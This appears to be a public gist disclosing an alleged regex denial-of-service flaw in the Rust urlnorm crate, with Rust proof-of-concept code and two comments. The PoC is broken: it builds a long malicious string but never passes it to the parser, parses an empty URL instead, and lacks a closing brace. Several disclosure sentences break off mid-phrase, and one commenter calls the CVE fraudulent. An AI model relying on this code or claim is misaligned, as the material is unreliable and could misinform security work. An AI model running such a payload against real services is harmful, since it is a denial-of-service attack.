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Created June 20, 2023 22:39
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Public disclosure of vulnerability inside the urlnorm crate through 0.1.4 for Rust
Regex Denial of service in urlnorm package on
The urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to
The regex defined on line 37. in used for trimming .html and other
extensions when normalizing the url is vulnerable to a Regex Denial of Service when malicious input is provided.
Poc Code:
use url::Url;
use urlnorm::UrlNormalizer;
use std::{time::{Duration, Instant}};
fn main() {
println!("[ + ] Testing urlnorm package");
let x = std::iter::repeat("A5.html").take(50000).collect::<String>().to_owned();
let norm = UrlNormalizer::default();
let mut url_input ="".to_owned();
let url = Url::parse(&url_input).unwrap();
let start = Instant::now();
let normalized = norm.compute_normalization_string(&url);
//let normalized = norm.normalize_host(&url).unwrap();
println!("[ + ] Url -> {:?}", normalized);
let end = start.elapsed();
println!("[ + ] Time elapsed {:?}", end);
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Is this vuln patched by dev ?
I tried on website I got "Error: PersistError(UnexpectedError("Storage fetch panicked"))"

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This CVE is fraudulent. The purported repro testcase takes a reasonable amount of time to process when you don't print the output. Slow printing of URLs is not a CVE.

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